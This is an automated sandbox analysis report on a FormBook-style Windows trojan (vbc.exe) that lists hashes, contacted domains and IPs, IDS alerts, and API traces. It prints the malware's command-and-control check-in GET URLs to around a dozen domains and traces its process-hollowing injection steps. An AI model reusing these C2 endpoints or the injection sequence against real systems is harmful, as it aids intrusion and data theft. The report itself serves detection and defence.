popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

vbc.exe

Malicious Library UPX PE File DLL OS Processor Check PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Nov. 17, 2021, 5:22 p.m. Nov. 17, 2021, 5:26 p.m.
Size 533.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 7c875245a2618b56ad9f9ee5b11bc6c8
SHA256 a81f4b0d0e1d5cc93e06323610f8500c2f0a0b5c15c890c104e3234bfee7fa68
CRC32 474DFB08
ssdeep 12288:iRnGW2kdxm7TNt9KeybAt1PSsczzGl5TYM2Dx:lcxm7TNt9Ke4E4ml5TYNl
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
www.fuli.tech
A 3.64.163.50
3.64.163.50
www.lrzoi.com
A 104.21.30.245
A 172.67.174.54
172.67.174.54
www.productorslleida.cat
CNAME productorslleida.cat
A 82.194.74.104
82.194.74.104
www.tuthuocgiadinh.store
CNAME dns.ladipage.com
A 13.214.5.92
A 13.250.192.238
A 13.250.255.10
CNAME ladi-dns-ssl-nlb-prod-4-5fac4e17b8b8295e.elb.ap-southeast-1.amazonaws.com
13.250.192.238
www.realitytv.info
CNAME realitytv.info
A 34.102.136.180
34.102.136.180
www.gymass.com
A 156.235.177.206
156.235.177.206
www.darqaftan.com
CNAME darqaftan.com
A 185.111.247.38
185.111.247.38
www.goodfellascandoit.com
CNAME www22.wixdns.net
CNAME balancer.wixdns.net
CNAME 47363d5c-balancer.wixdns.net
CNAME td-balancer-ae1-190-141.wixdns.net
A 34.80.190.141
34.80.190.141
www.krishnaengg.net
A 154.196.6.137
154.196.6.137
www.lo-nen.com
CNAME www242.wixdns.net
A 34.80.190.141
CNAME td-balancer-ae1-190-141.wixdns.net
CNAME 47363d5c-balancer.wixdns.net
CNAME balancer.wixdns.net
34.80.190.141
www.ankitparihar.tech
A 195.201.204.153
CNAME ankitparihar.tech
195.201.204.153
www.irlimcastore.com
A 107.152.33.165
107.152.33.165
www.shyezhuo.com
A 156.230.178.28
156.230.178.28
www.whatyoulike.online
www.accoladeleatherco.com
CNAME shops.myshopify.com
A 23.227.38.74
23.227.38.74
IP Address Status Action
104.21.30.245 Active Moloch
107.152.33.165 Active Moloch
13.250.255.10 Active Moloch
154.196.6.137 Active Moloch
156.230.178.28 Active Moloch
156.235.177.206 Active Moloch
164.124.101.2 Active Moloch
185.111.247.38 Active Moloch
195.201.204.153 Active Moloch
23.227.38.74 Active Moloch
3.64.163.50 Active Moloch
34.102.136.180 Active Moloch
34.80.190.141 Active Moloch
82.194.74.104 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49169 -> 82.194.74.104:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 82.194.74.104:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 82.194.74.104:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 156.235.177.206:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 156.235.177.206:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 156.235.177.206:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 23.227.38.74:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 23.227.38.74:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 23.227.38.74:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 185.111.247.38:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 185.111.247.38:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 185.111.247.38:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 156.230.178.28:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 156.230.178.28:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 156.230.178.28:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 195.201.204.153:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 195.201.204.153:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 195.201.204.153:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 34.80.190.141:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 34.80.190.141:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 34.80.190.141:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 34.80.190.141:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 34.80.190.141:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 107.152.33.165:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 34.80.190.141:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 107.152.33.165:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 107.152.33.165:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 13.250.255.10:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 13.250.255.10:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 13.250.255.10:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 154.196.6.137:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 154.196.6.137:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 154.196.6.137:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 3.64.163.50:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 3.64.163.50:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 3.64.163.50:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.ankitparihar.tech/s564/?DVoh7=qce3mniYJcUhGx6jJjQMypui68ggNYf4/cO+HRHDV2VTi0u3SOO7dhmWmLL1mXoL3jcKGyMD&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.goodfellascandoit.com/s564/?DVoh7=ZwqRkEb4YRudDQ5ao8MwUHoxZPnMRmYHWHgc2VuI9I/AWmS3hl7qr2I2ZaHL5QcQU5yYttSO&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.lo-nen.com/s564/?DVoh7=IoV10A9O9hI6xjd/Eu7xuTiDCqg5LFcSex0dmUHIfcr7tPMxLFFZRdTUSRPxaWdhtzN0wraY&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.productorslleida.cat/s564/?DVoh7=7vabDz73e2nBzFkhscXM1YUiiHdja1EfGByayVmH6y4sIKs7M/TWvQk3EGFoqlqGhGGH9VVQ&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.irlimcastore.com/s564/?DVoh7=tkxI0Mb4LtGWKS3F0F6uiGGSRSKHBaD6YH7HRTUImw9RnBOVaG+V/J3focIq/1NJJ9X8IXvr&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.realitytv.info/s564/?DVoh7=zFCjVjU4JD89Kye1rgvfte5q2HyViySNgPaGPcqg7zhnj9W/GJZy3a1Uiylr3MkqWgTQSH3i&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.krishnaengg.net/s564/?DVoh7=NlM2N+iiFwPSoOT/Rr2+VMHzjg0aPXuW8iNMk7SgAqucDRmRukkc4UYfZernm7k5MkxzPDpj&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.lrzoi.com/s564/?DVoh7=/DnP3brMbYSuodHq+1CqfNqxM6iFwKvfgvTsg7hi5QHuFPK85k4JAi7jkrMCin/3ikeWNIS0&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.gymass.com/s564/?DVoh7=mZz/UD0sXu6NPFw+t/AnerZg+DQ2IFpihByc1oG/U8wldi4ETkat0SIWDqG2aHPqXpodcPrp&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.accoladeleatherco.com/s564/?DVoh7=THangPgtxD5xwoas5y2S8tj4iTZ/CIysvf0w5FQFBkXYtdNoA6jg0UBXoRSeu31uR0gRAIpl&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.darqaftan.com/s564/?DVoh7=JzBuSKaJNb6j5KfT1bFXWjNUE/5oXAoCXlzu9BAxc5PloFX7PVbr115No1e84HoruL7HfMze&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.shyezhuo.com/s564/?DVoh7=2GrapIe6ItaFFknROml73pv0cgwBQmPYZZ7mdImcBQwY3AApWnrpiBowaynuclZYYj7IDedM&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.fuli.tech/s564/?DVoh7=9f6qGfOfyDOlMScrH6KKwHJ+2xXQ8xdlAf1yPUDkje30zSjnzLS7xurMqwj7zaj6zJzd0cBy&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.tuthuocgiadinh.store/s564/?DVoh7=DKK7aaacJqL9nJRf1WUrmc6x0mDq8ntwSfjAo261O7x5yXk6bM/WINMG1mzVKolgsX3t92gZ&6l=TlPx
request GET http://www.ankitparihar.tech/s564/?DVoh7=qce3mniYJcUhGx6jJjQMypui68ggNYf4/cO+HRHDV2VTi0u3SOO7dhmWmLL1mXoL3jcKGyMD&6l=TlPx
request GET http://www.goodfellascandoit.com/s564/?DVoh7=ZwqRkEb4YRudDQ5ao8MwUHoxZPnMRmYHWHgc2VuI9I/AWmS3hl7qr2I2ZaHL5QcQU5yYttSO&6l=TlPx
request GET http://www.lo-nen.com/s564/?DVoh7=IoV10A9O9hI6xjd/Eu7xuTiDCqg5LFcSex0dmUHIfcr7tPMxLFFZRdTUSRPxaWdhtzN0wraY&6l=TlPx
request GET http://www.productorslleida.cat/s564/?DVoh7=7vabDz73e2nBzFkhscXM1YUiiHdja1EfGByayVmH6y4sIKs7M/TWvQk3EGFoqlqGhGGH9VVQ&6l=TlPx
request GET http://www.irlimcastore.com/s564/?DVoh7=tkxI0Mb4LtGWKS3F0F6uiGGSRSKHBaD6YH7HRTUImw9RnBOVaG+V/J3focIq/1NJJ9X8IXvr&6l=TlPx
request GET http://www.realitytv.info/s564/?DVoh7=zFCjVjU4JD89Kye1rgvfte5q2HyViySNgPaGPcqg7zhnj9W/GJZy3a1Uiylr3MkqWgTQSH3i&6l=TlPx
request GET http://www.krishnaengg.net/s564/?DVoh7=NlM2N+iiFwPSoOT/Rr2+VMHzjg0aPXuW8iNMk7SgAqucDRmRukkc4UYfZernm7k5MkxzPDpj&6l=TlPx
request GET http://www.lrzoi.com/s564/?DVoh7=/DnP3brMbYSuodHq+1CqfNqxM6iFwKvfgvTsg7hi5QHuFPK85k4JAi7jkrMCin/3ikeWNIS0&6l=TlPx
request GET http://www.gymass.com/s564/?DVoh7=mZz/UD0sXu6NPFw+t/AnerZg+DQ2IFpihByc1oG/U8wldi4ETkat0SIWDqG2aHPqXpodcPrp&6l=TlPx
request GET http://www.accoladeleatherco.com/s564/?DVoh7=THangPgtxD5xwoas5y2S8tj4iTZ/CIysvf0w5FQFBkXYtdNoA6jg0UBXoRSeu31uR0gRAIpl&6l=TlPx
request GET http://www.darqaftan.com/s564/?DVoh7=JzBuSKaJNb6j5KfT1bFXWjNUE/5oXAoCXlzu9BAxc5PloFX7PVbr115No1e84HoruL7HfMze&6l=TlPx
request GET http://www.shyezhuo.com/s564/?DVoh7=2GrapIe6ItaFFknROml73pv0cgwBQmPYZZ7mdImcBQwY3AApWnrpiBowaynuclZYYj7IDedM&6l=TlPx
request GET http://www.fuli.tech/s564/?DVoh7=9f6qGfOfyDOlMScrH6KKwHJ+2xXQ8xdlAf1yPUDkje30zSjnzLS7xurMqwj7zaj6zJzd0cBy&6l=TlPx
request GET http://www.tuthuocgiadinh.store/s564/?DVoh7=DKK7aaacJqL9nJRf1WUrmc6x0mDq8ntwSfjAo261O7x5yXk6bM/WINMG1mzVKolgsX3t92gZ&6l=TlPx
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73a12000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74325000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2876
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00870000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\nsdE010.tmp\oinzo.dll
file C:\Users\test22\AppData\Local\Temp\nsdE010.tmp\oinzo.dll
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2876
region_size: 167936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000214
1 0 0
Process injection Process 2776 called NtSetContextThread to modify thread in remote process 2876
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2003108292
registers.esp: 1638384
registers.edi: 0
registers.eax: 4314096
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000020c
process_identifier: 2876
1 0 0
Lionic Trojan.Win32.Androm.4!c
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
FireEye Zum.Androm.1
Cybereason malicious.5a2618
Cyren W32/Injector.APR.gen!Eldorado
Symantec Packed.Generic.606
ESET-NOD32 a variant of Win32/Injector.EQOA
APEX Malicious
Paloalto generic.ml
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Zum.Androm.1
MicroWorld-eScan Zum.Androm.1
Emsisoft Zum.Androm.1 (B)
McAfee-GW-Edition BehavesLike.Win32.Dropper.hc
Sophos Mal/Generic-S
SentinelOne Static AI - Suspicious PE
MAX malware (ai score=84)
Kingsoft Win32.Troj.Generic_a.a.(kcloud)
Microsoft Trojan:Win32/Sabsik.FL.B!ml
GData Zum.Androm.1
McAfee Artemis!7C875245A261
Malwarebytes Trojan.Injector
Ikarus Trojan.NSIS.Agent.S
Fortinet W32/Injector.APR!tr
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2880
thread_handle: 0x0000020c
process_identifier: 2876
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\vbc.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\vbc.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\vbc.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000214
1 1 0

NtGetContextThread

 thread_handle: 0x0000020c
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2876
region_size: 167936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000214
1 0 0

NtSetContextThread

 registers.eip: 2003108292
registers.esp: 1638384
registers.edi: 0
registers.eax: 4314096
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000020c
process_identifier: 2876
1 0 0